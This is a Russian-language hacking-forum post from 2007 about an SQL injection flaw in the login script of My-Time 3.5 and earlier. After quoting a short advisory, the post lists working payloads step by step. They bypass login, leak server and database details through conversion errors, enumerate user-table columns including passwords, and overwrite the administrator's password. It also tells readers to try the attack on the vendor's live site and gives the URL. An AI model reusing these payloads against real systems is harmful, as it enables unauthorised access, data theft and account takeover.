Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   SQL-инъекция в My-Time<=3.5 (https://forum.antichat.xyz/showthread.php?t=54560)

-=lebed=- 27.11.2007 17:59
SQL-инъекция в My-Time<=3.5
 
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "login" и "password" сценарием login.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Тестим на сайте производителя! www.irola.com
_http://www.irola.com/mytime35/login.asp
1. Обход авторизации:
В поля ввода логин и пасс:
Код:
1' or 1=1--
2. Смотрим системные переменные:
Код:
1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--
3. Таблицы:
Код:
UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone
4. Меняем админский пароль:
Код:
-1' UPDATE UserInfo set Password= '1234' Where(UserID= '1');--
aria-security.net


Время: 01:51